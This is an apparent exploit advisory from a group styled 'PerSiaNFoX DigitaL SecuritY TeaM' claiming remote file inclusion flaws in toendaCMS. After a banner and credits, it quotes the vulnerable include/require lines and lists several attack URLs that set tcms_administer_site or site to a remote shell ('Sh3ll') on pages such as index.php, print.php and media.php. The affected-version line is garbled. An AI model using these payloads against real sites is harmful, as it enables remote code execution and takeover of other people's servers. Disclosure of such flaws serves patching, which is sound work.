*******************************************************************************
***
***
***
***
***
***
*** PerSiaNFoX DigitaL SecuritY TeaM
***
***
***
***
***
***
***
*******************************************************************************
<# ToendaCMS<= ( Remote File Include Vulnerabilities
<# Script.............. : toendaCMS
<# Discovered By.... : Root3r_H3ll
<# Location .......... : Iran
<# Class.............. : Remote
<# Original Advisory : http://Www.PersainFox.com
<# We ArE : Root3r_H3LL , Arash.RJ
<#Spical TNX HB Team , All My Freinds
-------------------------------------------------------------------------------------------------------------
< # CodE : include($tcms_administer_site.'/tcms_global/database.php')
< #Expolit :
< #http://Www.Site.coM/[path]/index.php?tcms_administer_site=Sh3ll
< #http://Www.Site.coM/[path]/browse.php?tcms_administer_site=Sh3ll
< #http://Www.Site.coM/[path]/print.php?tcms_administer_site=Sh3ll
< #http://Www.Site.coM/[path]/setup/inc/database.php?tcms_administer_site=Sh3ll
< # CodE : require($tcms_administer_site.'/tcms_global/database.php')
< #Expolit :
< #http://Www.Site.coM/[path]/media.php?tcms_administer_site=Sh3ll
< #CodE: include($site.'.php');
< # Expolit :
< # http://Www.Site.coM/[path]/setup/index.php?site=Sh3ll
